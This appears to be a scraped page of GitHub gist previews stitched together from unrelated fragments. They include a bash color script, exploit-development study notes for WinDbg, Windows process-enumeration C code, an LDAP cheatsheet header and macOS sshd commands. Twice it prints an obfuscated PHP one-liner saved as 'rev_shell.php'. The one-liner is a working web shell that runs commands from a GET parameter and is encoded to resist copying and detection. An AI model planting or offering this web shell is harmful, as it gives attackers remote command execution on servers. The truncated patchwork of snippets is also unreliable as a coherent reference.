Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.
You've got two main options:
| #! /bin/bash | |
| # NOTE: To make use of a wider color pallet set the TERM enviornment variable TERM=xterm-256color | |
| # Colors | |
| BOLD=$(tput bold) | |
| NOCOLOR=$(tput sgr0) | |
| RED=$(tput setaf 1) | |
| GREEN=$(tput setaf 2) | |
| YELLOW=$(tput setaf 3) |
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |
| Knowledge Area | recommendations | |
|---|---|---|
| ASM x86 & WinDbg | Get Your self familiar with x86 Assembly. | |
| Learn how to call Win32 APIs from assembly. | ||
| Understand the use case of each register (Why it’s EAX not EBX) | ||
| Custom and save your WingDBG workspace according to the binary/attack you are working on. | ||
| Get familiar with common WinDbg command such as : | ||
| 1.Search for Bytes, ANSI, ASCI DWORDS, etc.. in memory | ||
| 2. Show Specific memory permissions (Read, Write, Execute) | ||
| 3. Manually explorer PE Headers and Sections. | ||
| 4. List out the loaded modules. |
| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| DWORD getProcessID() { | |
| DWORD processID = 0; | |
| HANDLE snapHandle; | |
| PROCESSENTRY32 processEntry = {0}; | |
| if( (snapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE ) { | |
| return 0; |
| # high sierra | |
| sudo launchctl stop com.openssh.sshd | |
| sudo launchctl start com.openssh.sshd | |
| # latest | |
| sudo vim /etc/services # (update the port config for ssh and save) | |
| sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist | |
| sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist |
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |